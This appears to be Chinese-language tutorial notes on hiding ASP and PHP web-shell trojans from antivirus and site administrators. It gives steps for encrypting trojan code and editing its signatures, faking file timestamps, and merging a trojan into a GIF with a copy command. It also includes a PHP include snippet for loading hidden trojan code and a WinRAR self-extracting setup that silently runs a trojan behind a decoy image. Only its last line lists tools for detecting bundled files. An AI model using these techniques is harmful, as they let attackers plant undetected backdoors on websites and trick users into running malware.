ASP木马
第一加密免杀(decodescripting_pro.exe等加密工具)

把ASP木马的代码,进行加密,免杀

第二手工修改特征码免杀

替换特征码,免杀

第三节修改木马的时间属性（工具icyfox-time.exe)

修改木马文件的时间,迷惑网管.
第四制作asp图片木马

让木马文件与gif图片合并

copy 图片.gif /b + s.asp /a asp.gif

/b 二进制 /a ascii码

PHP木马
1.加密变形免杀

http://www.51shell.cn/fix/sai.php

2.正常文件中插马.正常php文件(ASP木马免杀课程中讲过修改文件时间的方法)

3.Include手工插入法

  建立一个txt文件和一个php文件
 
  加密后的木马代码存入txt文件
 
  把下面这段代码写入php文件
  <?php
  $guest=$_GET['guest'];
  include $read.txt;
  ?>

http://www.xxx.com/目录路径/guest.php?test=read.txt

4.手工替换特征码免杀,将一些关键字删除或者替换

PHP木马的免杀,躲避杀毒软件的检测.

二、winrar捆绑技术

WinRAR是个正常软件,不会被杀.所以我们用它捆绑木马.

1.选定两个文件“R_server.exe”和“lvc.jpg”，点击右键选添加到“XXXXX.rar”

2.双击打开生成好的rar文件，点工具栏上的自解压图标。

3.选择高级自解压选项。在“解压路径”中填入你要解压的路径: %systemroot%\temp(系统安装目录下的temp文件夹)，一般是c:\winnt\temp文件夹。

4.“解压缩之后运行”中输入木马的服务端“r_server.exe”，“解压缩之前后运行”中输入“lyc.jpg”。

5.点击“模式”标签，选择“全部隐藏”和“覆盖所有文件”这两个选项。

6.然后点击“文字和图标”标签，选择图标。

二、几个捆绑软件：

Gobind.exe binder.exe icodetoswf by臭要饭.exe 这几个都能实现木马的捆绑，但是同时这几个都被杀毒软件所查杀

三、检测文件是否被捆绑木马

Fbfd.exe   fearless bound file detector 0.2.exe execheck.exe